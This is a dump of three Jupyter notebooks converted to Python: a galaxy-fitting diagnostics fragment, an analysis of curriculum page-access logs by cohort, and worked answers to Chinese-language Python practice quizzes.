violins = sub.violinplot(dprop.T, positions=prop,
widths=[0.02, 0.02, 0.005, 0.01][i], showextrema=False)
for violin in violins['bodies']:
violin.set_facecolor('C0')
violin.set_alpha(1.)
sub.plot([[7., 12.], [-14., -9.], [-3, -1], [0., 13.2], [0., 3]][i], [0, 0], c='k', ls='--')
sub.set_xlim([[8., 11.], [-14., -9.], [-2.25, -1.6], [0., 13.2], [0., 3.]][i])
sub.set_ylim(-1., 1.)
for i in range(50)[::10]:
theta_deriv = np.array([logMstar_inf[i], logSSFR_inf[i]])#, logZ_MW_inf[i]])
theta_true = np.array([logMstar_true[i], logSSFR_true[i]])#, logZ_MW_true[i]])
DFM.corner(theta_deriv.T,
truths=theta_true,
range=[(9, 12), (-13, -9.)])#, (-3., -1)])
bad_ssfr = (np.abs(logSSFR_true - logssfr_q[:,1]) > 1.) #| (np.abs(logZ_MW_true - logzmw_q[:,1]) > 0.5)
logSSFR_true[bad_ssfr], logssfr_q[bad_ssfr, 1]
for i in np.arange(len(bad_ssfr))[bad_ssfr]:
fig = plt.figure(figsize=(10,3))
sub = fig.add_subplot(111)
sub.plot(wave_obs, flux_obs[igals[i]], c='k')
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_model'], c='C1', label='bestfit')
sub.set_xlim(3e3, 1e4)
sub.set_ylim(0, 4*np.max(chains[i]['flux_spec_model'][wave_obs > 5000]))
if ii == 0:
sub.legend(loc='upper left', fontsize=15, frameon=True)
sub.text(0.95, 0.95, 'i=%i' % i, ha='right', va='top', transform=sub.transAxes, fontsize=20)
for i in [3]:
'''
unt_theta_bf = prior.untransform(chains[i]['theta_bestfit'])
fig = plt.figure(figsize=(10, 10))
for ii in range(unt_theta_bf.shape[0]-1):
sub = fig.add_subplot(unt_theta_bf.shape[0]-1, 1, ii+1)
for j in range(30):
unt_chain_i = desi_mcmc.prior.untransform(chains[i]['mcmc_chain'][:,j,:])
sub.plot(unt_chain_i[:,ii], c='k', lw=0.5)
if ii == 0: sub.axhline(theta_obs['logM_fiber'][igals[i]], color='C0')
sub.axhline(unt_theta_bf[ii], color='C1')
sub.set_xlim(0,2500)
unt_chain = prior.untransform(desi_mcmc._flatten_chain(chains[i]['mcmc_chain'][:1500,:,:]))
fig = DFM.corner(unt_chain, truths=unt_bf)
theta_deriv = np.array([logMstar_inf[i], logSSFR_inf[i], logZ_MW_inf[i]])
theta_true = np.array([logMstar_true[i], logSSFR_true[i], logZ_MW_true[i]])
DFM.corner(theta_deriv.T,
truths=theta_true,
range=[(9, 12), (-13, -9.), (-3., -1)])
'''
theta_i = np.zeros(len(chains[i]['theta_bestfit']))
theta_i[0] = theta_obs['logM_fiber'][igals[i]]
theta_i[1] = 0.
theta_i[2] = 0.
theta_i[3] = 1.
theta_i[4] = 0.
theta_i[5] = 0
theta_i[7] = 3e-3
theta_i[8] = 2e-3#7.84027029e-05#1e-2# 2.89134312e-03
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
sub.plot(theta_obs['t_lookback'][igals[i]], (theta_obs['sfh_disk'][igals[i]] + theta_obs['sfh_bulge'][igals[i]]) / theta_obs['dt'][igals[i]] / 1e9, c='k')
sub.plot(theta_obs['t_lookback'][igals[i]], theta_obs['sfh_disk'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls='--', c='k')
sub.plot(theta_obs['t_lookback'][igals[i]], theta_obs['sfh_bulge'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls=':', c='k')
t, sfh = m_nmf.SFH(chains[i]['theta_bestfit'], zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), sfh)
t, sfh = m_nmf.SFH(theta_i, zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), sfh)
sub.set_xlim(0., 13.7)
sub.set_yscale('log')
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
sub.plot(theta_obs['t_lookback'][igals[i]], np.log10(theta_obs['Z_disk'][igals[i]]), c='k', ls='--')
sub.plot(theta_obs['t_lookback'][igals[i]], np.log10(theta_obs['Z_bulge'][igals[i]]), c='k', ls=':')
sub.axhline(logZ_MW_true[i], color='k', linestyle='-')
t, zh = m_nmf.ZH(chains[i]['theta_bestfit'], zred=theta_obs['redshift'][igals[i]])
#theta_obs['sfh_disk'][igals[i]] / theta_obs['dt'][igals[i]] / 1e9, ls='--', c='k')
sub.plot(0.5*(t[1:] + t[:-1]), np.log10(zh))
t, zh = m_nmf.ZH(theta_i, zred=theta_obs['redshift'][igals[i]])
sub.plot(0.5*(t[1:] + t[:-1]), np.log10(zh))
sub.set_xlim(0., 13.7)
#sub.set_yscale('log')
fig = plt.figure(figsize=(10,5))
sub = fig.add_subplot(111)
w, f= m_nmf.sed(theta_i, zred=theta_obs['redshift'][igals[i]], wavelength=chains[i]['wavelength_obs'])
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_obs'], c='k', label='bestfit')
sub.plot(chains[i]['wavelength_obs'], chains[i]['flux_spec_model'], c='C1', label='bestfit')
sub.plot(w, f)
sub.set_xlim(3.6e3, 1e4)
sub.set_ylim(0., 10)
# For all of the spectra we're able to reproduce $M_*$. However, for some of the spectra, we seem to be just recovering the prior for $\log{\rm SSFR}$ and $\log Z_{\rm MW}$. Lets check:
# - the bestfit spectra are good fits to the data
# - Is this due to inherent degeneracies in the model?
bad_ssfr = (logMstar_true > 9.) & (np.abs(logSSFR_true - logssfr_q[:,1]) > 1.) #| (np.abs(logZ_MW_true - logzmw_q[:,1]) > 0.5)
# +
fig = plt.figure(figsize=(20, 5))
sub = fig.add_subplot(131)
sub.errorbar(logMstar_true, logm_q[:,1],
yerr=[logm_q[:,1]-logm_q[:,0], logm_q[:,2]-logm_q[:,1]],
fmt='.C0')
sub.errorbar(logMstar_true[bad_ssfr], logm_q[bad_ssfr,1],
yerr=[logm_q[bad_ssfr,1]-logm_q[bad_ssfr,0], logm_q[bad_ssfr,2]-logm_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([9., 12.], [9., 12], c='k', ls='--')
sub.set_xlim(9., 12.)
sub.set_ylim(9., 12.)
sub = fig.add_subplot(132)
sub.errorbar(logSSFR_true, logssfr_q[:,1],
yerr=[logssfr_q[:,1]-logssfr_q[:,0], logssfr_q[:,2]-logssfr_q[:,1]],
fmt='.C0')
sub.errorbar(logSSFR_true[bad_ssfr], logssfr_q[bad_ssfr,1],
yerr=[logssfr_q[bad_ssfr,1]-logssfr_q[bad_ssfr,0], logssfr_q[bad_ssfr,2]-logssfr_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([-9., -15.], [-9., -15], c='k', ls='--')
sub.set_xlim(-14, -9.)
sub.set_ylim(-14, -9.)
sub = fig.add_subplot(133)
sub.errorbar(logZ_MW_true, logzmw_q[:,1],
yerr=[logzmw_q[:,1] - logzmw_q[:,0], logzmw_q[:,2] - logzmw_q[:,1]],
fmt='.C0')
sub.errorbar(logZ_MW_true[bad_ssfr], logzmw_q[bad_ssfr,1],
yerr=[logzmw_q[bad_ssfr,1] - logzmw_q[bad_ssfr,0], logzmw_q[bad_ssfr,2] - logzmw_q[bad_ssfr,1]],
fmt='.C1')
sub.plot([-3., -1], [-3, -1], c='k', ls='--')
sub.set_xlim(-3., -1)
sub.set_ylim(-3., -1)
| 16,194 |
/.ipynb_checkpoints/day1-checkpoint.ipynb
|
eaaba4dd4d9868e7663e1eea4f79bbd3116c7948
|
[] |
no_license
|
melinashk/python-practices
|
https://github.com/melinashk/python-practices
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 5,671 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np
import pandas as pd
import math
from sklearn import metrics
from scipy.stats import entropy
import warnings
warnings.filterwarnings("ignore")
import matplotlib.pyplot as plt
import matplotlib.dates as mdates #to format dates on our plots
# %matplotlib inline
import seaborn as sns
# -
colnames=['date', 'time','destination','student_id', 'cohort',
'ip' ]
df = pd.read_csv('curriculum-access.txt', engine='python',
header=None,
index_col=False,
names=colnames,
sep=r'\s(?=(?:[^"]*"[^"]*")*[^"]*$)(?![^\[]*\])',
na_values='"-"',
usecols=[0, 1, 2, 3, 4, 5, 6])
df
df['datetime'] = df['date'] + ' ' + df['time']
df['datetime'] = pd.to_datetime(df.datetime)
df = df.drop(columns = ['date', 'time'])
df = df.set_index('datetime')
df.head()
# Daily page-view counts for the Curie cohort (cohort id 55).
curie = df[df.cohort == 55]
curie['count'] = 1
curie_n = curie['count'].resample('1D').sum()
curie_n
# Bollinger-band style anomaly detection: a 7-day exponential moving average
# forms the midband, and +/- 6 standard deviations of the trailing window
# form the upper/lower bands.
span = 7
ema_long = curie_n.ewm(span=span, adjust=False).mean()
midband = ema_long[-1]
ub = midband + ema_long[-24:-1].std()*6
lb = midband - ema_long[-24:-1].std()*6
ub, lb
midband
# %b: where each day's count sits inside the band -- values above 1 are
# beyond the upper band, i.e. anomalously high activity.
pct_b = pd.DataFrame({'pct_b': (curie_n-lb)/(ub-lb)})
curie_n= pd.DataFrame(curie_n)
curie_n = pd.concat([curie_n, pct_b], axis=1)
curie_n
curie_n[curie_n.pct_b >1]
plt.figure(figsize=(12,4))
plt.plot(curie_n.pct_b, label = 'pct_b')
plt.grid()
plt.axhline(y=1.0, color='r', linestyle='-')
plt.legend()
# ### Curie students were studying really hard on April 30th for quiz!!
#
# ****
page_view = curie.groupby('destination').count()
page_view = page_view.to_dict()
curie['views'] = curie['destination'].map(page_view['student_id'])
curie.sort_values('views', ascending = False)
top_10 = curie.groupby('destination').count().sort_values('count', ascending = False).iloc[0:11]
top_10
df.loc['2019-04-04': '2019-06-30'][pd.df.cohort.isna == True]
ada = df[pd.isna(df.cohort) == True].loc['2019-02-03': '2019-06-30']
ada.student_id.unique()
ada
ada_list = pd.Series([349, 350, 351, 352, 353, 354, 355, 357, 358, 359, 360, 361,
362, 363, 364, 365, 366, 367, 368, 369, 372])
ada = df[df['student_id'].isin(ada_list)]
ada.loc['2019-12-01': '2020-05-15']
ada.loc['2019-12-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'}).iloc[2:10].view_count.plot.bar(figsize=(10,4), label = 'views')
plt.show()
ada_views = ada.loc['2019-12-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'})
ada_views
bayes = df[df.cohort == 34]
bayes.student_id.unique()
bayes_list = [466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478,
479, 480, 481, 482, 483, 484, 485, 358]
bayes = df[df.student_id.isin(bayes_list)]
bayes.loc['2020-02-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'}).iloc[0:10].view_count.plot.bar(figsize=(10,4))
bayes_views = bayes.loc['2020-02-01': '2020-05-15'].groupby('destination').count().sort_values('student_id', ascending = False).rename(columns = {'student_id': 'view_count'})
bayes_views
views = pd.concat([ada_views,bayes_views])
views.groupby('destination').sum().sort_values('view_count', ascending = False).view_count.iloc[2:12].plot.bar(figsize = (12,4), label = 'views')
plt.ylabel('views')
plt.title('Ada and Bayes page views after graduation')
plt.xticks(rotation = 80)
instructors = df[df.cohort == 28]
instructors.student_id.unique()
df[df.student_id == 37]
df = df.destination.dropna()
def get_topic(destination):
    """Classify a curriculum page path as "Data Science", "Web Dev" or "Unknown".

    Matching is a plain case-sensitive substring test against a few
    course-specific keywords; Data Science keywords are checked first.
    """
    ds_keywords = ["python", "time series", "nlp"]
    wd_keywords = ["javascript", "java", "css"]
    if any(keyword in destination for keyword in ds_keywords):
        return "Data Science"
    if any(keyword in destination for keyword in wd_keywords):
        return "Web Dev"
    return "Unknown"
df["course"] = df.destination.apply(get_topic)
df.loc['2020-04-08 09:25:18'].destination = '2-storytelling/2.2-create'
df[df.course == 'Unknown']
ds = pd.concat([ada, bayes, curie])
ds = ds.drop(columns = 'views')
ds
ds['cohort'] = ds.cohort.fillna(100)
ds = ds.dropna()
ds.head(3)
ada_size = ds[ds.cohort == 100].student_id.nunique()
curie_size = ds[ds.cohort == 55].student_id.nunique()
bayes_size = ds[ds.cohort == 34].student_id.nunique()
ds_sampled = ds.resample('H').count()
ds_sampled['hour'] = ds_sampled.index.hour
ds_sampled.head(4)
ds_af = ds_sampled[(ds_sampled['hour']<8) | (ds_sampled['hour']>5)]
ds_af.resample('D').sum().ip.plot()
ada_sampled = ada.resample('H').count()
bayes_sampled = bayes.resample('H').count()
curie_sampled = curie.resample('H').count()
ada_sampled['hour'] = ada_sampled.index.hour
bayes_sampled['hour'] = bayes_sampled.index.hour
curie_sampled['hour'] = curie_sampled.index.hour
ada_af = ada_sampled[(ada_sampled['hour']<8) | (ada_sampled['hour']>5)]/ada_size
bayes_af = bayes_sampled[(bayes_sampled['hour']<8) | (bayes_sampled['hour']>5)]/bayes_size
curie_af = curie_sampled[(curie_sampled['hour']<8) | (curie_sampled['hour']>5)]/curie_size
# +
ada_af.resample('D').sum().ip.plot(label = 'Ada')
bayes_af.resample('D').sum().ip.plot(label = 'Bayes')
curie_af.resample('D').sum().ip.plot(label = 'Curie')
plt.ylabel('Afterhour page views per student')
plt.legend()
# -
ada_stat = ada_af.loc['2019-02-01': '2019-06-15'].resample('M').sum().iloc[:,:1]
bayes_stat = bayes_af.loc['2019-09-01': '2020-01-15'].resample('M').sum().iloc[:,:1]
curie_stat = curie_af.loc['2020-02-03': '2020-05-15'].resample('M').sum().iloc[:,:1]
ada_stat['month'] = [1,2,3,4,5]
bayes_stat['month'] = [1,2,3,4,5]
curie_stat['month'] = [1,2,3,4]
bayes_stat
sns.barplot(x = 'month', y = 'destination', data = ada_stat)
sns.barplot(x = 'month', y = 'destination', data = bayes_stat)
sns.barplot(x = 'month', y = 'destination', data = curie_stat)
data = pd.concat([ada_stat.reset_index().drop(columns = ['datetime','month']),bayes_stat.reset_index().drop(columns = 'datetime'),curie_stat.reset_index().drop(columns = ['datetime','month'])], axis =1)
data.columns = ['Ada', 'Bayes', 'month', 'Curie']
data
data.plot.bar(x = 'month', y = ['Ada', 'Bayes', 'Curie'])
plt.ylabel('Average afterhour page views per student')
plt.title('Afterhours pageviews per student by month')
df[df.cohort==34]
| 6,716 |
/Python_quiz_ans.ipynb.ipynb
|
16ceb5b1cc7ff2cdb3d09d63cb682050730fe624
|
[] |
no_license
|
ehearo/Python_Practice
|
https://github.com/ehearo/Python_Practice
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 36,973 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # 1 Input Output and Comment
# ## quiz1:
# 分別使用 input() 輸入你的名字、性別、年齡 <br>
# 並使用三種 print() 分別輸出一段包含這些資料的句子。<br>
# print("" %())<br>
# print("").format())<br>
# print(f'')<br>
#
# 選一個之後你主要要用來 print 的方式 (推薦 f-string)<br>
name, gender, age = input('Please enter your name, gender, age:').split(' ')
print("name: %s, gender: %s, age: %s" % (name, gender, age))
print("name: {}, gender: {}, age: {}".format(name, gender, age))
print(f"name: {name}, gender: {gender}, age: {age}")
# # 2 Data Type
# ## quiz1:
# 給定字串如下,使用 slicing 取出<br>
# 整數部分<br>
# 字元部分<br>
# s = '1a2b3c4d5e6f'<br>
s = '1a2b3c4d5e6f'
print(s[0::2])
print(s[1::2])
# ## quiz2:
#
# 輸入你的身高 (cm),以及體重 (kg)<br>
# 計算 BMI 後以兩位小數點的精準度印出 (BMI = 體重(kg) / (身高(m))^2)<br>
# height = input()<br>
# weight = input()<br>
# +
height, weight = input('Please enter your height(cm), weight(kg):').split(' ')
BMI = int(weight)/(int(height)/100)**2
print(f"{BMI:.2f}")
# -
# # 3 Containers
# ## quiz 1
#
# 宣告一個 list<br>
# 新增 1 筆任意數字<br>
# 新增 5 筆任意數字<br>
# 逆排序<br>
# 刪除 index 為 3的數字<br>
# 在前面新增 5 個任意數字<br>
# 排序<br>
# 轉換成 tuple<br>
# 宣告一個 list
a = []
# 新增 1 筆任意數字
a.append(-7)
print(a)
# 新增 5 筆任意數字
a += [-3, 2, 5, 7, 9]
print(a)
# 逆排序
b = a[::-1]
print(b)
# 刪除 index 為 3的數字
a.pop(3)
print(a)
# 在前面新增 5 個任意數字
a = [0, 2, 4, 6, 8] + a
print(a)
# 排序
a.sort()
print(a)
# 轉換成 tuple
c = tuple(a)
print(c)
# ## quiz 2
# 宣告兩個一樣長度的 list, 接著使用 zip 加上型別轉換,建構出一個 dictionary
key = ["name", "gender", "age"]
val = ["Jacky", "man", 26]
obj = zip(key, val)
dict(obj)
# ## quiz 3
#
# 使用生成式,宣告兩個集合 (set) ,一個集合 (s1) 內有 -3至 5 的所有整數,另一個 (s2) 有 1 至 8 的所有整數<br>
# 印出兩集合的 交集<br>
# 印出兩集合的 聯集<br>
# 印出兩集合互相的 差集<br>
S1 = {elem for elem in range(-3,5+1)}
print(S1)
S2 = {elem for elem in range(1,8+1)}
print(S2)
print(S1 & S2)
print(S1 | S2)
print(S1 - S2)
print(S2 - S1)
# # 4 Control Flow
# ## quiz1:
# 請使用 control flow 結合 for迴圈,計算此成績列的 GPA。
#
# **成績與 GP 對照表**<br>
# 90 <= score          : 4.3<br>
# 85 <= score < 90 : 4.0<br>
# 80 <= score < 85 : 3.7<br>
# 77 <= score < 80 : 3.3<br>
# 73 <= score < 77 : 3.0<br>
# 70 <= score < 73 : 2.7<br>
# 67 <= score < 70 : 2.3<br>
# 63 <= score < 67 : 2.0<br>
# 60 <= score < 63 : 1.7<br>
# 50 <= score < 60 : 1.0<br>
#            score < 50 : 0<br>
#
# **每筆資料為 (科目成績, 科目學分數)**<br>
# transcript = [(50, 1), (78, 2), (96, 2), (80, 3), (81, 2), (56, 3), (73, 3), (80, 3), (99, 2), (95, 1), <br>
#                      (87, 3), (76, 3), (77, 1), (81, 3), (89, 2), (53, 3), (59, 2), (68, 2), (54, 3), (58, 3)]
transcript = [(50, 1), (78, 2), (96, 2), (80, 3), (81, 2), (56, 3), (73, 3), (80, 3), (99, 2), (95, 1),
              (87, 3), (76, 3), (77, 1), (81, 3), (89, 2), (53, 3), (59, 2), (68, 2), (54, 3), (58, 3)]
# +
# Grade-point cutoffs, highest first: a score earns the GP of the first
# cutoff it reaches; anything below 50 earns 0.
gp_cutoffs = [(90, 4.3), (85, 4.0), (80, 3.7), (77, 3.3), (73, 3.0),
              (70, 2.7), (67, 2.3), (63, 2.0), (60, 1.7), (50, 1.0)]

total_gp = 0
total_weight = 0
for score, weight in transcript:
    gp = 0
    for cutoff, grade_point in gp_cutoffs:
        if score >= cutoff:
            gp = grade_point
            break
    # Credit-weighted grade points: GPA = sum(gp * credits) / sum(credits).
    total_gp += gp * weight
    total_weight += weight

GPA = total_gp / total_weight
print(GPA)
# -
# ## quiz2:
# 下面是一個資料集的影像名稱,每張影像除了有六碼編號之外,還有它屬於的類別 (01 ~ 04)
#
# data = ['IMG035833_02.jpeg',<br>
#              'IMG069933_03.jpeg',<br>
#              'IMG001572_02.jpeg',<br>
#              'IMG025945_02.jpeg',<br>
#              'IMG024850_01.jpeg',<br>
#              'IMG086288_03.jpeg',<br>
#              'IMG069932_04.jpeg',<br>
#              'IMG032322_04.jpeg',<br>
#              'IMG049740_03.jpeg',<br>
#              'IMG013506_03.jpeg',<br>
#              'IMG001813_01.jpeg',<br>
#              'IMG014431_04.jpeg',<br>
#              'IMG026580_04.jpeg',<br>
#              'IMG028975_04.jpeg',<br>
#              'IMG079073_04.jpeg',<br>
#              'IMG049077_02.jpeg',<br>
#              'IMG033090_04.jpeg',<br>
#              'IMG040904_04.jpeg',<br>
#              'IMG065895_03.jpeg',<br>
#              'IMG012382_01.jpeg',<br>
#              'IMG028850_03.jpeg',<br>
#              'IMG068507_01.jpeg',<br>
#              'IMG078936_04.jpeg',<br>
#              'IMG003145_04.jpeg',<br>
#              'IMG056011_02.jpeg',<br>
#              'IMG015516_01.jpeg',<br>
#              'IMG077548_02.jpeg',<br>
#              'IMG040693_01.jpeg',<br>
#              'IMG015801_02.jpeg',<br>
#              'IMG066898_02.jpeg',<br>
#              'IMG039423_04.jpeg',<br>
#              'IMG085263_03.jpeg',<br>
#              'IMG068941_04.jpeg',<br>
#              'IMG028542_03.jpeg',<br>
#              'IMG016187_01.jpeg',<br>
#              'IMG046760_02.jpeg',<br>
#              'IMG083860_03.jpeg',<br>
#              'IMG012974_03.jpeg',<br>
#              'IMG094728_04.jpeg',<br>
#              'IMG023535_01.jpeg',<br>
#              'IMG046037_04.jpeg',<br>
#              'IMG084306_02.jpeg',<br>
#              'IMG008328_01.jpeg',<br>
#              'IMG097630_04.jpeg',<br>
#              'IMG046427_02.jpeg',<br>
#              'IMG098467_03.jpeg',<br>
#              'IMG078326_02.jpeg',<br>
#              'IMG036626_03.jpeg',<br>
#              'IMG060321_04.jpeg',<br>
#              'IMG082753_01.jpeg',<br>
#              'IMG066053_02.jpeg',<br>
#              'IMG082360_04.jpeg',<br>
#              'IMG082000_02.jpeg',<br>
#              'IMG098735_04.jpeg',<br>
#              'IMG028116_03.jpeg',<br>
#              'IMG018454_03.jpeg',<br>
#              'IMG053744_03.jpeg',<br>
#              'IMG010996_04.jpeg',<br>
#              'IMG062445_03.jpeg',<br>
#              'IMG040778_03.jpeg',<br>
#              'IMG034566_01.jpeg',<br>
#              'IMG095526_04.jpeg',<br>
#              'IMG010351_03.jpeg',<br>
#              'IMG085847_04.jpeg',<br>
#              'IMG013204_03.jpeg',<br>
#              'IMG060903_03.jpeg',<br>
#              'IMG043702_03.jpeg',<br>
#              'IMG020717_01.jpeg',<br>
#              'IMG026048_02.jpeg',<br>
#              'IMG068022_03.jpeg']<br>
#
#
# 觀察上面檔名的規律,並宣告四個 list,設計程式將上述影像檔名,把他們的編號放置到四個對應的類別 list 中。
#
# 做為參考,在執行完你的程式後,四個 list 會存入的東西分別為:<br>
# category1_id = ['024850', '001813', '012382', '068507' .... ]<br>
# category2_id = ['035833', '001572', '025945', '049077' .... ]<br>
# category3_id = ['069933', '086288', '049740', '013506' .... ]<br>
# category4_id = ['069932', '032322', '014431', '026580' .... ]<br>
data = ['IMG035833_02.jpeg',
'IMG069933_03.jpeg',
'IMG001572_02.jpeg',
'IMG025945_02.jpeg',
'IMG024850_01.jpeg',
'IMG086288_03.jpeg',
'IMG069932_04.jpeg',
'IMG032322_04.jpeg',
'IMG049740_03.jpeg',
'IMG013506_03.jpeg',
'IMG001813_01.jpeg',
'IMG014431_04.jpeg',
'IMG026580_04.jpeg',
'IMG028975_04.jpeg',
'IMG079073_04.jpeg',
'IMG049077_02.jpeg',
'IMG033090_04.jpeg',
'IMG040904_04.jpeg',
'IMG065895_03.jpeg',
'IMG012382_01.jpeg',
'IMG028850_03.jpeg',
'IMG068507_01.jpeg',
'IMG078936_04.jpeg',
'IMG003145_04.jpeg',
'IMG056011_02.jpeg',
'IMG015516_01.jpeg',
'IMG077548_02.jpeg',
'IMG040693_01.jpeg',
'IMG015801_02.jpeg',
'IMG066898_02.jpeg',
'IMG039423_04.jpeg',
'IMG085263_03.jpeg',
'IMG068941_04.jpeg',
'IMG028542_03.jpeg',
'IMG016187_01.jpeg',
'IMG046760_02.jpeg',
'IMG083860_03.jpeg',
'IMG012974_03.jpeg',
'IMG094728_04.jpeg',
'IMG023535_01.jpeg',
'IMG046037_04.jpeg',
'IMG084306_02.jpeg',
'IMG008328_01.jpeg',
'IMG097630_04.jpeg',
'IMG046427_02.jpeg',
'IMG098467_03.jpeg',
'IMG078326_02.jpeg',
'IMG036626_03.jpeg',
'IMG060321_04.jpeg',
'IMG082753_01.jpeg',
'IMG066053_02.jpeg',
'IMG082360_04.jpeg',
'IMG082000_02.jpeg',
'IMG098735_04.jpeg',
'IMG028116_03.jpeg',
'IMG018454_03.jpeg',
'IMG053744_03.jpeg',
'IMG010996_04.jpeg',
'IMG062445_03.jpeg',
'IMG040778_03.jpeg',
'IMG034566_01.jpeg',
'IMG095526_04.jpeg',
'IMG010351_03.jpeg',
'IMG085847_04.jpeg',
'IMG013204_03.jpeg',
'IMG060903_03.jpeg',
'IMG043702_03.jpeg',
'IMG020717_01.jpeg',
'IMG026048_02.jpeg',
'IMG068022_03.jpeg']
category1_id = []
category2_id = []
category3_id = []
category4_id = []
# Filenames look like IMGxxxxxx_cc.jpeg: chars 3..8 are the image id,
# chars 10..11 the category code. Unknown codes fall through to category 4,
# matching the original if/elif/else chain.
_buckets = {'01': category1_id, '02': category2_id, '03': category3_id}
for fname in data:
    img_id, cat = fname[3:9], fname[10:12]
    _buckets.get(cat, category4_id).append(img_id)
print(category1_id)
print(category2_id)
print(category3_id)
print(category4_id)
D = {}
for fname in data:
    img_id, cat = fname[3:9], fname[10:12]
    # setdefault creates the bucket the first time a category code appears.
    D.setdefault(cat, []).append(img_id)
print(D)
# # quiz3:
#
# 請使用 list comprehension 建構出一個二維的 list,內容如下
#
# [[10, 11, 12, 13, 14, 16, 17, 18, 19],<br>
#  [20, 21, 22, 23, 24, 26, 27, 28, 29],<br>
#  [30, 31, 32, 33, 34, 36, 37, 38, 39],<br>
#  [40, 41, 42, 43, 44, 46, 47, 48, 49],<br>
#  [60, 61, 62, 63, 64, 66, 67, 68, 69],<br>
#  [70, 71, 72, 73, 74, 76, 77, 78, 79],<br>
#  [80, 81, 82, 83, 84, 86, 87, 88, 89],<br>
#  [90, 91, 92, 93, 94, 96, 97, 98, 99]]<br>
# The quiz's expected output skips row 5 (50..59) and column 5 (x5), which the
# original comprehension wrongly included. Bound to `grid` so the cell still
# displays the value.
grid = [[row * 10 + col for col in range(10) if col != 5] for row in range(1, 10) if row != 5]
grid
# # 5 Functions
# ## quiz1:
# 實作一個 lambda function,把輸入 (數字) 平方之後加上 5 回傳。
# Square the input, then add 5.
f = lambda value: value * value + 5
f(10)
# ## quiz2:
# 實作一個 function,輸入寬 (w) 及長 (l) 後印出如附圖所示的鉛筆形狀。
# +
# |******
# |*******
# w********
# |*******
# |******
# --l--
# e.g.
# pencil(5, 6) 會印出
# *******
# ********
# *********
# ********
# *******
# -
def pencil(w, l):
    """Print a pencil: w rows; the shaft is l stars, the tip widens to the middle.

    NOTE(review): this matches the quiz's ASCII figure (6,7,8,7,6 stars for
    pencil(5, 6)); the quiz's "e.g." text shows one star more per row — the
    two parts of the spec contradict each other.
    """
    for row in range(w):
        tip = min(row, w - row - 1)  # distance to the nearer edge row
        print("*" * (l + tip))


pencil(5, 6)
# ## quiz3:
# 建構一個 費式數列 的 generator
#
# 使用 next() 的時候<br>
# 第一次 yield 1<br>
# 第二次 yield 1<br>
# 第三次 yield 2<br>
# 第四次 yield 3<br>
# 第五次 yield 5<br>
# ... 以此類推<br>
# f(0) = 0
# f(1) = 1
# f(n) = f(n-1)+f(n-2)
def fib_generator():
    """Yield the Fibonacci numbers 1, 1, 2, 3, 5, 8, ... (f(1) onward).

    Fix: the original yielded a leading 0 (f(0)), but the quiz spec says the
    first two next() calls must both return 1.
    """
    prev, cur = 0, 1
    while True:
        yield cur
        prev, cur = cur, prev + cur
# +
# 可以使用此段程式驗證你的 generator 有沒有成功
f = fib_generator()
for i in range(10):
print(next(f))
# -
# # 6 Object Oriented Programming (OOP)
# ## quiz1:
# 運用 person 內的一些屬性(性別年齡身高體重)實作 BMR 的計算。
#
# BMR(男)=(13.7×體重(公斤))+(5.0×身高(公分))-(6.8×年齡)+66<br>
# BMR(女)=(9.6×體重(公斤))+(1.8×身高(公分))-(4.7×年齡)+655<br>
class person:
    """A person carrying the attributes needed for a BMR calculation."""

    def __init__(self, name, age, height, weight, gender):
        self.name = name
        self.age = age
        self.gender = gender  # 'Male' or 'Female'
        self.height = height  # cm
        self.weight = weight  # kg

    def __repr__(self):
        return f'Class Person: {self.name}'

    def BMR(self):
        """Basal metabolic rate per the quiz formulas; None for other genders.

        Male:   13.7*weight + 5.0*height - 6.8*age + 66
        Female:  9.6*weight + 1.8*height - 4.7*age + 655

        Fixes vs. the original: it matched 'Man'/'Male' so the documented
        labels hit the wrong branches, and used +60 instead of the spec's +66.
        """
        if self.gender == 'Male':
            return 13.7 * self.weight + 5.0 * self.height - 6.8 * self.age + 66
        elif self.gender == 'Female':
            return 9.6 * self.weight + 1.8 * self.height - 4.7 * self.age + 655
        return None
# Demo with the documented gender labels ('Male' / 'Female'); the original
# passed 'Man', which is not one of the labels declared in __init__.
p1 = person('Jacky', 26, 178, 64, 'Male')
print(p1.BMR())
p2 = person('Jacky', 26, 178, 64, 'Female')
print(p2.BMR())
# ## quiz2:
# 給定一個正多邊形的父類別,使用繼承分別定出正三角形,正四邊形的子類別。
#
# 並在正三角形類別實作面積與高的 method。<br>
# 在正四邊形類別實作面積與對角線長的 method。<br>
# +
class polygon:  # regular polygon
    """A regular polygon; `length` is the total perimeter."""

    def __init__(self, length):
        self.length = length

    def __repr__(self):
        return f'Polygon of length {self.length}'


class triangle(polygon):
    """Equilateral triangle built from a perimeter of `length` (edge = length/3)."""

    def __init__(self, length):
        super().__init__(length)
        self.edge = self.length / 3

    def __repr__(self):
        # Fix: the original built this string but never returned it, so
        # repr(instance) yielded None and repr() raised TypeError.
        return f'Triangle of height {self.height()}' + f"\nArea : {self.area()}"

    def area(self):
        """Area of an equilateral triangle: (sqrt(3)/4) * edge**2."""
        return (3 ** (1 / 2)) / 4 * self.edge ** 2

    def height(self):
